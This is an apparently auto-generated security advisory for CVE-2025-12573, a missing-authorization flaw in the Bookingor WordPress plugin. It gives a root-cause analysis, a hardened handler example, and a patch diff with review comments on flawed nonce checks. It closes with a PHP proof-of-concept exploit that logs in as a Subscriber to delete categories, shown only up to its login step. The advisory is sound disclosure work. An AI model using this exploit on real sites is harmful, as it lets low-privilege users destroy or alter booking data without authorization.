Atomic Edge Proof of Concept automated generator using AI diff analysis
Published: March 18, 2026

CVE-2025-12573: Bookingor <= 1.0.12 – Missing Authorization (bookingor)

Plugin: bookingor
Severity: Medium (CVSS 4.3)
CWE: 862 (Missing Authorization)
Vulnerable version: <= 1.0.12
Patched version: 1.0.13
Disclosed: January 19, 2026

Analysis Overview

Atomic Edge analysis of CVE-2025-12573:
The Bookingor WordPress plugin, in all versions up to and including 1.0.12, is missing authorization checks on its admin-ajax handlers (CWE-862). Any authenticated user, down to the Subscriber role, can invoke actions that are meant for administrators: creating, updating and deleting categories, services, staff, locations, customers and notification templates. The issue is rated CVSS 4.3 (Medium).

Atomic Edge traced the root cause to missing capability checks and missing nonce verification across the plugin's AJAX handler functions under `bookingor/admin/include/`. Functions such as `delete_category` in `category-control.php`, `update_location` in `location-control.php` (line 137) and `updates_design_templates` in `templates-control.php` (line 13) start processing as soon as `isset($_REQUEST['action'])` is true. That condition is routing, not authorization: `admin-ajax.php` fires the `wp_ajax_{action}` hook for every logged-in user regardless of role. None of the handlers calls `current_user_can('manage_options')` (or any other capability check) and none validates a WordPress nonce, so every logged-in user can reach them. The `// phpcs:disable WordPress.Security.NonceVerification.* -- Verified elsewhere.` comments at the top of each handler silenced the linter warnings that would have flagged exactly this, while no such verification existed anywhere in the plugin.

Exploitation requires only a valid WordPress account with at least Subscriber privileges, which any site with open registration hands out. The attacker sends a POST request to `/wp-admin/admin-ajax.php` with an `action` parameter naming a vulnerable handler. To delete a category, for example, `action=delete_category` and `id=<category id>` are enough; no nonce is required, and because the delete handlers read `id` from `$_REQUEST`, a GET request works just as well. The same pattern reaches the other handlers (adding services, updating staff details, changing template settings) by switching the `action` value and supplying the POST fields that handler expects.

The patch introduces two controls. First, `class-bookingor-admin.php` now creates a nonce with `wp_create_nonce('bookingor_ajax_nonce')` and localizes it to the client as `TCN_BIND.nonce`. Second, each handler gains a nonce check and a capability check at its top; in `category-control.php`, for example, both the delete path (hunk at line 38) and the add path (hunk at line 115) now run `wp_verify_nonce(...)` and then `if (!current_user_can('manage_options'))`. Reading the diff closely shows that only the second control is effective: the nonce block runs only when `$_POST['nonce']` is present, and when verification fails it assigns an error `$response` but neither outputs it nor stops, so execution continues into the capability check. The capability check does `echo wp_json_encode($response); die();`, and it is what actually closes CVE-2025-12573. `booking-control.php` receives only the nonce block and no capability check at all. The patch also grants custom capabilities (`bp_delete_category`, `bp_add_category`, `bp_update_category`, `bp_get_category`) to the administrator role in `class-bookingor-activator.php`, but no handler in the diff checks them; every handler uses `manage_options`.
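To make the distinction between the two controls concrete, here is a minimal handler in the shape of the vulnerable delete path beside a hardened version. This is an added example written for this page, not code from the Bookingor plugin or its patch: the `wp_ajax_delete_category` hook name, the `bookingor_categories` table and `category_id` column, and both function names are assumptions. The hardened version uses WordPress's `check_ajax_referer()` and `wp_send_json_error()` instead of the patch's manual `wp_verify_nonce()` block, so that a missing or invalid nonce terminates the request instead of falling through to the next check.

```php
<?php
// Added example (not Bookingor code). Hook, table, column and function names are assumed.
// Runs inside WordPress, so $wpdb, absint(), wp_unslash(), check_ajax_referer(),
// current_user_can(), wp_send_json_error() and wp_send_json_success() exist.

// --- Vulnerable shape, kept for contrast and NOT hooked below ---
// wp_ajax_{action} fires for every logged-in user whatever their role, so
// isset($_REQUEST['action']) is routing, not authorization: a Subscriber who
// posts action=delete_category&id=5 reaches the DELETE.
function bookingor_delete_category_vulnerable() {
    global $wpdb;
    $table = $wpdb->prefix . 'bookingor_categories'; // assumed table name
    if ( isset( $_REQUEST['action'] ) && isset( $_REQUEST['id'] ) ) {
        $id = absint( $_REQUEST['id'] );
        $wpdb->delete( $table, array( 'category_id' => $id ), array( '%d' ) ); // assumed column
        echo wp_json_encode( array( 'status' => 'success', 'message' => 'Category deleted.' ) );
    }
    die();
}

// --- Hardened shape: CSRF token and authorization, each fatal on failure ---
function bookingor_delete_category_hardened() {
    global $wpdb;

    // 1. CSRF: the nonce must be present AND valid. With $stop = false,
    //    check_ajax_referer() returns false instead of printing "-1", so we
    //    choose the response. An absent nonce fails here; it is never skipped.
    if ( ! check_ajax_referer( 'bookingor_ajax_nonce', 'nonce', false ) ) {
        wp_send_json_error( array( 'message' => 'Nonce verification failed.' ), 403 ); // sends JSON and exits
    }

    // 2. Authorization: a nonce proves the request came from a page the site
    //    served to this user; it says nothing about role. Check the capability
    //    separately, and stop on failure.
    if ( ! current_user_can( 'manage_options' ) ) {
        wp_send_json_error( array( 'message' => 'You do not have permission.' ), 403 );
    }

    // 3. Input: state changes read $_POST only (not $_REQUEST), and the id is
    //    type-coerced before it reaches the query.
    $id = isset( $_POST['id'] ) ? absint( wp_unslash( $_POST['id'] ) ) : 0;
    if ( 0 === $id ) {
        wp_send_json_error( array( 'message' => 'Invalid category id.' ), 400 );
    }

    $table   = $wpdb->prefix . 'bookingor_categories';
    $deleted = $wpdb->delete( $table, array( 'category_id' => $id ), array( '%d' ) );
    if ( false === $deleted ) {
        wp_send_json_error( array( 'message' => 'Database error.' ), 500 );
    }
    wp_send_json_success( array( 'message' => 'Category deleted.', 'rows' => (int) $deleted ) );
}

// Register only the hardened handler. Deliberately no wp_ajax_nopriv_ hook:
// unauthenticated visitors must not reach this action at all.
add_action( 'wp_ajax_delete_category', 'bookingor_delete_category_hardened' );
```

On the client, each request carries `nonce: TCN_BIND.nonce`, the value the patch's `wp_localize_script()` call exposes. The two checks defend against different attackers and neither replaces the other: an administrator lured into submitting a forged request passes the capability check but fails the nonce, while a Subscriber who can read the nonce out of a page the plugin's scripts load on (a Subscriber can open their own profile in wp-admin, and if the enqueue callback is not restricted to the plugin's screens the nonce is present there) passes the nonce check but fails the capability check. That second case is why a nonce alone would not have fixed CVE-2025-12573.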

A successful attack lets a low-privileged user perform administrative actions inside the plugin: deleting or modifying booking categories, services, staff profiles, customer records, locations and notification templates. That is enough to disrupt bookings, alter pricing or availability, and destroy data. The flaw does not by itself give remote code execution or site takeover, which is why the score stays at Medium; the damage is to the booking data and to the business logic built on it.

Differential between vulnerable and patched code

Code Diff
--- a/bookingor/admin/class-bookingor-admin.php
+++ b/bookingor/admin/class-bookingor-admin.php
@@ -242,7 +242,8 @@
 		wp_enqueue_script($this->plugin_name . '-full-calendar-list', plugins_url('js/full-calender/packages/list/index.global.js', __FILE__), array('jquery'), '6.10.0', true);
 		wp_enqueue_script($this->plugin_name . '-full-calendar-time-grid', plugins_url('js/full-calender/packages/timegrid/index.global.js', __FILE__), array('jquery'), '6.10.0', true);
 		wp_enqueue_script($this->plugin_name . '-full-calendar-interaction', plugins_url('js/full-calender/packages/interaction/index.global.js', __FILE__), array('jquery'), '6.10.0', true);
-		wp_localize_script('jquery', 'TCN_BIND', array('GET_URL' => admin_url('admin-ajax.php')));
+		$ajax_nonce = wp_create_nonce('bookingor_ajax_nonce');
+		wp_localize_script('jquery', 'TCN_BIND', array('GET_URL' => admin_url('admin-ajax.php'), 'nonce' => $ajax_nonce));
 		// tostr
 		wp_enqueue_script($this->plugin_name . '-toastr', plugin_dir_url(dirname(__FILE__)) . 'includes/toastr/js/jquery.toast.js', array(), '2.1.4', true);
 		// datepicker
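Review bot: the nonce is localized onto the core `jquery` handle rather than one of the plugin's own handles enqueued on the lines just above, so `TCN_BIND` and the nonce are exposed on every admin screen where this callback runs, including screens a Subscriber can open such as their own profile. Attach it to a plugin script handle, and if the enqueue callback is not already limited to the plugin's pages, gate it on the `$hook_suffix` argument of `admin_enqueue_scripts`. A nonce minted here is also only worth anything if the server-side handlers stop on a bad or missing nonce.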
--- a/bookingor/admin/include/booking/booking-control.php
+++ b/bookingor/admin/include/booking/booking-control.php
@@ -110,6 +110,14 @@
         // phpcs:disable WordPress.Security.NonceVerification.Recommended -- Verified elsewhere.
         // phpcs:disable WordPress.Security.NonceVerification.Missing -- Verified elsewhere.
         if (isset($_REQUEST['action'])) {
+                        if (isset($_POST['nonce'])) {
+                if (!wp_verify_nonce(sanitize_text_field(wp_unslash($_POST['nonce'])), 'bookingor_ajax_nonce')) {
+                    $response = [
+                        'status' => htmlspecialchars('error'),
+                        'message' => htmlspecialchars('Nonce verification failed.')
+                    ];
+                }
+            }
             $get_book_id = sanitize_text_field(wp_unslash($_REQUEST['booking_stats_id'] ?? ""));
             $get_book_status = sanitize_text_field(wp_unslash($_POST['book_status'] ?? ""));
             $bookings = $wpdb->get_row(
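Review bot: no `current_user_can()` check is added to this handler, unlike every other hunk in the patch, and the nonce block that is added has no effect: when `wp_verify_nonce()` fails, `$response` is assigned and execution simply continues into the `$wpdb->get_row()` query on the next context line, and a request that omits `nonce` never enters the block at all because of the outer `isset($_POST['nonce'])`. Since the handler reads `book_status` from `$_POST`, it looks like a state change and is still reachable by any logged-in user. Suggest `check_ajax_referer('bookingor_ajax_nonce', 'nonce');` followed by a capability check that dies, and deleting the two `phpcs:disable ... -- Verified elsewhere.` comments above it, which claim verification that does not happen.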
--- a/bookingor/admin/include/category/category-control.php
+++ b/bookingor/admin/include/category/category-control.php
@@ -38,7 +38,25 @@
 		// phpcs:disable WordPress.Security.NonceVerification.Recommended -- Verified elsewhere.
         // phpcs:disable WordPress.Security.NonceVerification.Missing -- Verified elsewhere.
 		if (isset($_REQUEST["id"])) {
-			$id = stripslashes(filter_var($_REQUEST["id"], FILTER_SANITIZE_NUMBER_INT)); // phpcs:ignore WordPress.Security.ValidatedSanitizedInput.MissingUnslash
+			if (isset($_POST['nonce'])) {
+				if (!wp_verify_nonce(sanitize_text_field(wp_unslash($_POST['nonce'])), 'bookingor_ajax_nonce')) {
+					$response = [
+						'status' => htmlspecialchars('error'),
+						'message' => htmlspecialchars('Nonce verification failed.')
+					];
+				}
+			}
+			$id = stripslashes(filter_var($_REQUEST["id"], FILTER_SANITIZE_NUMBER_INT)); // phpcs:ignore WordPress.Security.ValidatedSanitizedInput.
+
+
+			if (!current_user_can('manage_options')) {
+				$response = [
+					'status' => htmlspecialchars('error'),
+					'message' => htmlspecialchars('You do not have permission.')
+				];
+				echo wp_json_encode($response);
+				die();
+			}

 			$get_category_in_booking = $wpdb->get_results(
 				$wpdb->prepare(
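Review bot: the nonce check on the `+` lines is a no-op: it runs only when `nonce` is posted, and on failure it fills `$response` and falls through to `$id = ...` and then to `current_user_can('manage_options')`, so a valid nonce is never actually required. The capability check is what closes the hole; keep it, but make the nonce mandatory and terminal, for example `if ( ! check_ajax_referer( 'bookingor_ajax_nonce', 'nonce', false ) ) { echo wp_json_encode( $response ); die(); }` without the surrounding `isset()`. The `phpcs:disable WordPress.Security.NonceVerification.* -- Verified elsewhere.` lines above were untrue before this patch and should be removed so the linter covers this code again. The inserted lines also mix tabs and spaces.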
@@ -61,8 +79,8 @@
 					'status' => htmlspecialchars('error'),
 					'message' => htmlspecialchars('Category is already in use.')
 				];
-				echo wp_json_encode($response);;
-				exit;
+				echo wp_json_encode($response);
+				die();
 			}
 		}
 	}
@@ -96,8 +114,8 @@
 				'status' => htmlspecialchars('success'),
 				'message' => htmlspecialchars("Category Updated successfully")
 			];
-			echo wp_json_encode($response);;
-			exit;
+			echo wp_json_encode($response);
+			die();
 		}
 	}
 	/**
@@ -115,6 +133,22 @@
 		global $wpdb;
 		$category = $wpdb->prefix . self::$dp_prefix . 'categories';
 		if (isset($_REQUEST['action'])) {
+		if (isset($_POST['nonce'])) {
+				if (!wp_verify_nonce(sanitize_text_field(wp_unslash($_POST['nonce'])), 'bookingor_ajax_nonce')) {
+					$response = [
+						'status' => htmlspecialchars('error'),
+						'message' => htmlspecialchars('Nonce verification failed.')
+					];
+				}
+			}
+			if (!current_user_can('manage_options')) {
+				$response = [
+					'status' => htmlspecialchars('error'),
+					'message' => htmlspecialchars('You do not have permission.')
+				];
+				echo wp_json_encode($response);
+				die();
+			}
 			$category_name   = sanitize_text_field(wp_unslash($_POST['tcn_category_name'] ?? ""));
 			$category_icon   = absint(wp_unslash($_POST['tcn_category_icon_id'] ?? ""));
 			$category_status = sanitize_text_field(wp_unslash($_POST['tcn_category_status'] ?? "" ));
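Review bot: same fall-through as the earlier hunk in this file: a failed `wp_verify_nonce()` sets `$response` and continues, and a missing `nonce` skips the block entirely, so `current_user_can('manage_options')` is the only effective guard. Since the activator hunk grants `bp_add_category` and this hunk is the add path (it reads `tcn_category_name`), this is where `current_user_can('bp_add_category')` would be checked if the custom capabilities are meant to be used; as written they are dead. The `+` line `if (isset($_POST['nonce'])) {` is also indented one level shallower than its own closing brace.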
@@ -139,8 +173,8 @@
 				'status' => htmlspecialchars('success'),
 				'message' => htmlspecialchars('Category Added successfully.')
 			];
-			echo wp_json_encode($response);;
-			exit;
+			echo wp_json_encode($response);
+			die();
 		}
 	}
 	/**
@@ -193,7 +227,7 @@
 				)
 			);

-		echo wp_json_encode($response);;
+		echo wp_json_encode($response);
 		die;
 	}
 }
--- a/bookingor/admin/include/customer/customer-control.php
+++ b/bookingor/admin/include/customer/customer-control.php
@@ -56,6 +56,22 @@
 		// phpcs:disable WordPress.Security.NonceVerification.Missing -- Verified elsewhere.
 		$id = stripslashes(filter_var($_REQUEST["id"] ?? "", FILTER_SANITIZE_NUMBER_INT)); // phpcs:ignore WordPress.Security.ValidatedSanitizedInput.MissingUnslash

+					if (isset($_POST['nonce'])) {
+				if (!wp_verify_nonce(sanitize_text_field(wp_unslash($_POST['nonce'])), 'bookingor_ajax_nonce')) {
+					$response = [
+						'status' => htmlspecialchars('error'),
+						'message' => htmlspecialchars('Nonce verification failed.')
+					];
+				}
+			}
+			if (!current_user_can('manage_options')) {
+				$response = [
+					'status' => htmlspecialchars('error'),
+					'message' => htmlspecialchars('You do not have permission.')
+				];
+				echo wp_json_encode($response);
+				die();
+			}
 		$get_customer_in_booking = $wpdb->get_results(
 			$wpdb->prepare(
 				"SELECT book_id, duration_service, start_time, end_time, picked_date_end, picked_date, service_get_price,  paid_amount, payment_method, customer_time_zone, token_code, appoint_status, category_get_id, service_get_id, staff_get_id, location_get_id, updated_at, created_at FROM {$wpdb->prefix}bookingor_booked_appointment  WHERE customer_get_id = %d",
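Review bot: the nonce failure here neither echoes nor returns, so the customer lookup on the following lines still executes for a bad nonce; only the `manage_options` check stops the request. The inserted block is also indented to a depth that matches nothing around it (`if (isset($_POST['nonce'])) {` sits five tab stops in while its closing brace sits three), which hides the fact that the guard runs after `$id` has already been read. Re-indent, and make the nonce failure terminal like the capability failure.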
--- a/bookingor/admin/include/location/location-control.php
+++ b/bookingor/admin/include/location/location-control.php
@@ -60,6 +60,22 @@
         // phpcs:disable WordPress.Security.NonceVerification.Recommended -- Verified elsewhere.
         // phpcs:disable WordPress.Security.NonceVerification.Missing -- Verified elsewhere.
         if (isset($_REQUEST['action'])) {
+                        if (isset($_POST['nonce'])) {
+                if (!wp_verify_nonce(sanitize_text_field(wp_unslash($_POST['nonce'])), 'bookingor_ajax_nonce')) {
+                    $response = [
+                        'status' => htmlspecialchars('error'),
+                        'message' => htmlspecialchars('Nonce verification failed.')
+                    ];
+                }
+            }
+            if (!current_user_can('manage_options')) {
+				$response = [
+					'status' => htmlspecialchars('error'),
+					'message' => htmlspecialchars('You do not have permission.')
+				];
+				echo wp_json_encode($response);
+				die();
+			}
             $location_title = sanitize_text_field(wp_unslash($_POST['bookingor_location_title'] ?? ''));
             $location_icon = sanitize_text_field(wp_unslash($_POST['location_icon_id'] ?? ''));
             $location_phone   = sanitize_text_field(wp_unslash($_POST['bp_location_phone_number'] ?? ''));
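Review bot: the nonce block is the same non-terminating pattern: a wrong nonce fills `$response`, then `current_user_can('manage_options')` decides, and a request that omits `nonce` never enters the block. Replacing the nine `+` lines with `check_ajax_referer('bookingor_ajax_nonce', 'nonce');` would die with `-1` on failure and needs no `isset()` guard. The capability block is tab-indented inside a space-indented method.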
@@ -137,6 +153,22 @@
         global $wpdb;
         $update_location = $wpdb->prefix . self::$dp_prefix . 'location';
         if (isset($_REQUEST['action'])) {
+                        if (isset($_POST['nonce'])) {
+                if (!wp_verify_nonce(sanitize_text_field(wp_unslash($_POST['nonce'])), 'bookingor_ajax_nonce')) {
+                    $response = [
+                        'status' => htmlspecialchars('error'),
+                        'message' => htmlspecialchars('Nonce verification failed.')
+                    ];
+                }
+            }
+            if (!current_user_can('manage_options')) {
+				$response = [
+					'status' => htmlspecialchars('error'),
+					'message' => htmlspecialchars('You do not have permission.')
+				];
+				echo wp_json_encode($response);
+				die();
+			}
             $location_title = sanitize_text_field(wp_unslash($_POST['bookingor_location_title'] ?? ""));
             $location_id   = sanitize_text_field(wp_unslash($_POST['location_id'] ?? ""));
             $location_icon = sanitize_text_field(wp_unslash($_POST['location_icon_id_update'] ?? ""));
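Review bot: this is the `update_location` path named in the advisory, and it carries an exact copy of the add handler's guard including the fall-through on nonce failure. Consider hoisting the nonce-plus-capability guard into one private method on the class and calling it first in every handler; the next handler added to this file then cannot forget it, and a fix to the nonce logic lands in one place instead of the fourteen copies in this patch.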
--- a/bookingor/admin/include/notification/notification-control.php
+++ b/bookingor/admin/include/notification/notification-control.php
@@ -47,6 +47,23 @@
 		// phpcs:disable WordPress.Security.NonceVerification.Recommended -- Verified elsewhere.
 		// phpcs:disable WordPress.Security.NonceVerification.Missing -- Verified elsewhere.
 		if (isset($_REQUEST['action'])) {
+
+						if (isset($_POST['nonce'])) {
+				if (!wp_verify_nonce(sanitize_text_field(wp_unslash($_POST['nonce'])), 'bookingor_ajax_nonce')) {
+					$response = [
+						'status' => htmlspecialchars('error'),
+						'message' => htmlspecialchars('Nonce verification failed.')
+					];
+				}
+			}
+			if (!current_user_can('manage_options')) {
+				$response = [
+					'status' => htmlspecialchars('error'),
+					'message' => htmlspecialchars('You do not have permission.')
+				];
+				echo wp_json_encode($response);
+				die();
+			}
 			$email_get_id = sanitize_text_field(wp_unslash($_POST['email_id'] ?? ""));
 			$email_subject = sanitize_text_field(wp_unslash($_POST['subject'] ?? ""));
 			$email_content = wp_kses_post(wp_unslash($_POST['body'] ?? ""));
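Review bot: because the nonce check does not terminate, an administrator can still be CSRF'd into updating a notification template: the capability check passes for them and the forged request, which carries no valid nonce, proceeds to the `update` below with attacker-chosen `subject` and `body`. `wp_kses_post()` limits the body to post-safe HTML but does not stop that. Make the nonce failure `die()` like the capability failure does, and drop the stray empty `+` line and the mismatched indentation while here.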
--- a/bookingor/admin/include/services/service-control.php
+++ b/bookingor/admin/include/services/service-control.php
@@ -138,6 +138,22 @@
         // phpcs:disable WordPress.Security.NonceVerification.Missing -- Verified elsewhere.
         $service_get_id = isset($_REQUEST['get_service_id']) ? intval($_REQUEST['get_service_id']) : 0;
         if (isset($_REQUEST['action'])) {
+            if (isset($_POST['nonce'])) {
+                if (!wp_verify_nonce(sanitize_text_field(wp_unslash($_POST['nonce'])), 'bookingor_ajax_nonce')) {
+                    $response = [
+                        'status' => htmlspecialchars('error'),
+                        'message' => htmlspecialchars('Nonce verification failed.')
+                    ];
+                }
+            }
+            if (!current_user_can('manage_options')) {
+				$response = [
+					'status' => htmlspecialchars('error'),
+					'message' => htmlspecialchars('You do not have permission.')
+				];
+				echo wp_json_encode($response);
+				die();
+			}
             // phpcs:disable WordPress.Security.NonceVerification.Missing -- Verified elsewhere.
             $service_name   = sanitize_text_field(wp_unslash($_POST['service_name'] ?? ""));
             $service_icon   = sanitize_text_field(wp_unslash($_POST['service_icon_id'] ?? ""));
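Review bot: this handler now has two `phpcs:disable WordPress.Security.NonceVerification.Missing -- Verified elsewhere.` comments, one above the hunk and one on the first context line after it; both should be removed once real nonce verification is in place, otherwise the linter will keep ignoring exactly the class of bug being fixed. The inserted nonce check still does not terminate on failure, so only `manage_options` is enforced here.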
@@ -294,6 +310,23 @@


         if (isset($_REQUEST['action'])) {
+
+                        if (isset($_POST['nonce'])) {
+                if (!wp_verify_nonce(sanitize_text_field(wp_unslash($_POST['nonce'])), 'bookingor_ajax_nonce')) {
+                    $response = [
+                        'status' => htmlspecialchars('error'),
+                        'message' => htmlspecialchars('Nonce verification failed.')
+                    ];
+                }
+            }
+            if (!current_user_can('manage_options')) {
+				$response = [
+					'status' => htmlspecialchars('error'),
+					'message' => htmlspecialchars('You do not have permission.')
+				];
+				echo wp_json_encode($response);
+				die();
+			}
             //tab basic
             $service_name   = sanitize_text_field(wp_unslash($_POST['service_name'] ?? ""));
             $service_icon   = sanitize_text_field(wp_unslash($_POST['service_icon_id'] ?? ""));
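Review bot: the whole `//tab basic` update below runs for a request with a bad or absent nonce as long as the caller is an administrator, because the nonce block only assigns `$response` and continues. Make the nonce failure `die()` as the capability failure does. The blank `+` line and the deep indentation of `if (isset($_POST['nonce'])) {` do not match the rest of the method.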
@@ -432,6 +465,24 @@
         $delete_service = $wpdb->prefix . self::$dp_prefix . 'services';
         $delete_staff_assign_service = $wpdb->prefix . self::$dp_prefix . 'staff_assign_service';
         $id = sanitize_text_field(wp_unslash(isset($_REQUEST["id"]) ? $_REQUEST["id"] : ""));
+
+         if (isset($_POST['nonce'])) {
+                if (!wp_verify_nonce(sanitize_text_field(wp_unslash($_POST['nonce'])), 'bookingor_ajax_nonce')) {
+                    $response = [
+                        'status' => htmlspecialchars('error'),
+                        'message' => htmlspecialchars('Nonce verification failed.')
+                    ];
+                }
+        }
+        if (!current_user_can('manage_options')) {
+				$response = [
+					'status' => htmlspecialchars('error'),
+					'message' => htmlspecialchars('You do not have permission.')
+				];
+				echo wp_json_encode($response);
+				die();
+			}
+
         $wpdb->delete($delete_service, array(
             'service_id' => $id
         ));
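Review bot: the guard is placed after `$id` is read but before `$wpdb->delete()`, which is the right ordering for the capability check; the nonce check again only assigns `$response` and does not stop the delete. Two smaller points visible here: `$id` is taken from `$_REQUEST`, so a GET request deletes a service, and it is passed to `$wpdb->delete()` as a sanitized string with no format, so `absint()` plus a `'%d'` format would state the intent. The `+` lines are indented at two different space widths that match neither the line above nor the one below.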
--- a/bookingor/admin/include/staff/staff-control.php
+++ b/bookingor/admin/include/staff/staff-control.php
@@ -118,6 +118,23 @@
 		$staff_location_assign = $wpdb->prefix . self::$dp_prefix . 'location_assign_staff';
 		$staff_get_id =  isset($_REQUEST['get_staff_id']) ? intval($_REQUEST['get_staff_id']) : 0;
 		if (isset($_REQUEST['action'])) {
+
+			            if (isset($_POST['nonce'])) {
+                if (!wp_verify_nonce(sanitize_text_field(wp_unslash($_POST['nonce'])), 'bookingor_ajax_nonce')) {
+                    $response = [
+                        'status' => htmlspecialchars('error'),
+                        'message' => htmlspecialchars('Nonce verification failed.')
+                    ];
+                }
+            }
+			if (!current_user_can('manage_options')) {
+				$response = [
+					'status' => htmlspecialchars('error'),
+					'message' => htmlspecialchars('You do not have permission.')
+				];
+				echo wp_json_encode($response);
+				die();
+			}
 			$staff_first_name = sanitize_text_field(isset($_POST['staff_first_name']) ? $_POST['staff_first_name'] : '');
 			$staff_last_name = sanitize_text_field(isset($_POST['staff_last_name']) ? $_POST['staff_last_name'] : '');
 			$staff_phone = sanitize_text_field(isset($_POST['staff_phone']) ? $_POST['staff_phone'] : '');
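Review bot: the nonce block does not terminate on failure and is skipped when `nonce` is absent, so `manage_options` is the only effective control for staff creation. Visible in the context lines but untouched by the hunk: the `$_POST['staff_*']` values pass through `sanitize_text_field()` without `wp_unslash()`, unlike the other files, so a backslash in a name is stored escaped.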
@@ -250,6 +267,22 @@
 		$assign_staff_service = $wpdb->prefix . self::$dp_prefix . 'staff_assign_service';
 		$staff_location_assign = $wpdb->prefix . self::$dp_prefix . 'location_assign_staff';
 		if (isset($_REQUEST['action'])) {
+			            if (isset($_POST['nonce'])) {
+                if (!wp_verify_nonce(sanitize_text_field(wp_unslash($_POST['nonce'])), 'bookingor_ajax_nonce')) {
+                    $response = [
+                        'status' => htmlspecialchars('error'),
+                        'message' => htmlspecialchars('Nonce verification failed.')
+                    ];
+                }
+            }
+			if (!current_user_can('manage_options')) {
+				$response = [
+					'status' => htmlspecialchars('error'),
+					'message' => htmlspecialchars('You do not have permission.')
+				];
+				echo wp_json_encode($response);
+				die();
+			}
 			$staff_first_name =  sanitize_text_field($_POST['staff_first_name'] ?? "");
 			$staff_last_name = sanitize_text_field($_POST['staff_last_name'] ?? "");
 			$staff_phone = sanitize_text_field($_POST['staff_phone'] ?? "");
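Review bot: duplicate of the staff-add guard with the same fall-through on nonce failure; the `if (isset($_POST['nonce'])) {` line is indented with tabs followed by spaces while the `current_user_can` block directly under it uses tabs only. A shared guard method would remove this copy and the drift between copies.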
--- a/bookingor/admin/include/templates/templates-control.php
+++ b/bookingor/admin/include/templates/templates-control.php
@@ -13,6 +13,23 @@
     public function updates_design_templates()
     {
         if (isset($_REQUEST['action'])) {
+
+            			if (isset($_POST['nonce'])) {
+				if (!wp_verify_nonce(sanitize_text_field(wp_unslash($_POST['nonce'])), 'bookingor_ajax_nonce')) {
+					$response = [
+						'status' => htmlspecialchars('error'),
+						'message' => htmlspecialchars('Nonce verification failed.')
+					];
+				}
+			}
+            if (!current_user_can('manage_options')) {
+				$response = [
+					'status' => htmlspecialchars('error'),
+					'message' => htmlspecialchars('You do not have permission.')
+				];
+				echo wp_json_encode($response);
+				die();
+			}
             if (isset($_REQUEST['editingId']) && sanitize_text_field($_REQUEST['editingId']) === '1') {
                 update_option(self::$name_prefix . '_settings_background_border_active_design_1', sanitize_text_field($_POST['settings_background_border_active_design_1'] . 'px' ?? ''));
                 update_option(self::$name_prefix . '_settings_background_border_color_design_1', sanitize_text_field($_POST['settings_background_border_color_design_1'] ?? ''));
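Review bot: `updates_design_templates()` writes many options, so the capability check is the right gate, but the nonce block above it does not stop on failure and leaves the handler CSRF-able for administrators. Worth fixing in the same pass: the context line `sanitize_text_field($_POST['settings_background_border_active_design_1'] . 'px' ?? '')` applies `?? ''` to the result of the concatenation, which is never null, so a missing field yields `'px'` plus a PHP warning instead of the intended default; the `?? ''` belongs on the array access.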
@@ -174,6 +191,22 @@
     public static function bp_settings_get_design_templates_data()
     {
         if (isset($_REQUEST['action'])) {
+            if (isset($_POST['nonce'])) {
+				if (!wp_verify_nonce(sanitize_text_field(wp_unslash($_POST['nonce'])), 'bookingor_ajax_nonce')) {
+					$response = [
+						'status' => htmlspecialchars('error'),
+						'message' => htmlspecialchars('Nonce verification failed.')
+					];
+				}
+			}
+            if (!current_user_can('manage_options')) {
+				$response = [
+					'status' => htmlspecialchars('error'),
+					'message' => htmlspecialchars('You do not have permission.')
+				];
+				echo wp_json_encode($response);
+				die();
+			}
             //stripe
             $dcimal_point = get_option(self::$name_prefix . '_currency_decimal_point');
             get_option(self::$name_prefix . '_settings_stripe_sandbox');
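Review bot: for a read-only getter the `manage_options` check is the meaningful change here, and the nonce block is non-terminating as elsewhere. Before merging, confirm that no non-admin caller uses this action: the context lines show it returning currency and Stripe settings, and if the public booking form requests them through the same action, every visitor now receives the permission error.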
--- a/bookingor/includes/class-bookingor-activator.php
+++ b/bookingor/includes/class-bookingor-activator.php
@@ -34,7 +34,14 @@
     ob_flush();
     ob_start();

-
+    // Add custom capabilities
+    $role = get_role('administrator');
+    if ($role) {
+      $role->add_cap('bp_delete_category');
+      $role->add_cap('bp_add_category');
+      $role->add_cap('bp_update_category');
+      $role->add_cap('bp_get_category');
+    }

     //category
     global $wpdb;
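Review bot: the four `bp_*_category` capabilities are granted to administrators here, but nothing in this patch calls `current_user_can('bp_delete_category')` or any of the others; every handler checks `manage_options`, so these lines add no protection. Either check them in the handlers or drop them. Note also that `add_cap()` in the activation hook runs only on (re)activation and not on a plugin update, and that it persists in the roles option, so it needs a matching `remove_cap()` in the deactivator if it stays.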

Proof of Concept (PHP)

NOTICE:

This proof-of-concept is provided for educational and authorized security research purposes only.

You may not use this code against any system, application, or network without explicit prior authorization from the system owner.

Unauthorized access, testing, or interference with systems may violate applicable laws and regulations in your jurisdiction.

This code is intended solely to illustrate the nature of a publicly disclosed vulnerability in a controlled environment and may be incomplete, unsafe, or unsuitable for real-world use.

By accessing or using this information, you acknowledge that you are solely responsible for your actions and compliance with applicable laws.

 
PHP PoC
<?php
// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
// Atomic Edge CVE Research - Proof of Concept
// CVE-2025-12573 - Bookingor <= 1.0.12 - Missing Authorization
//
// The <?php tag has to be the first thing in the file: anything before it is
// sent to the output verbatim, so the header comments now sit inside the block.

// Configuration
$target_url  = 'http://vulnerable-site.com/wp-admin/admin-ajax.php';
$username    = 'subscriber'; // Attacker's low-privilege username
$password    = 'password';   // Attacker's password
$category_id = '5';          // ID of the category to delete
$cookie_jar  = tempnam(sys_get_temp_dir(), 'wpsess'); // session cookies are stored here

// Step 1: Authenticate to WordPress and obtain session cookies
$login_url = str_replace('admin-ajax.php', 'wp-login.php', $target_url);
$ch = curl_init();
curl_setopt_array($ch, [
    CURLOPT_URL            => $login_url,
    CURLOPT_POST           => true,
    CURLOPT_POSTFIELDS     => http_build_query([
        'log'         => $username,
        'pwd'         => $password,
        'wp-submit'   => 'Log In',
        'redirect_to' => $target_url,
        'testcookie'  => '1',
    ]),
    CURLOPT_RETURNTRANSFER => true,
    CURLOPT_COOKIEJAR      => $cookie_jar, // Save session cookies ...
    CURLOPT_COOKIEFILE     => $cookie_jar, // ... and send them on later requests
    CURLOPT_FOLLOWLOCATION => true,
]);
$response = curl_exec($ch);
if ($response === false) {
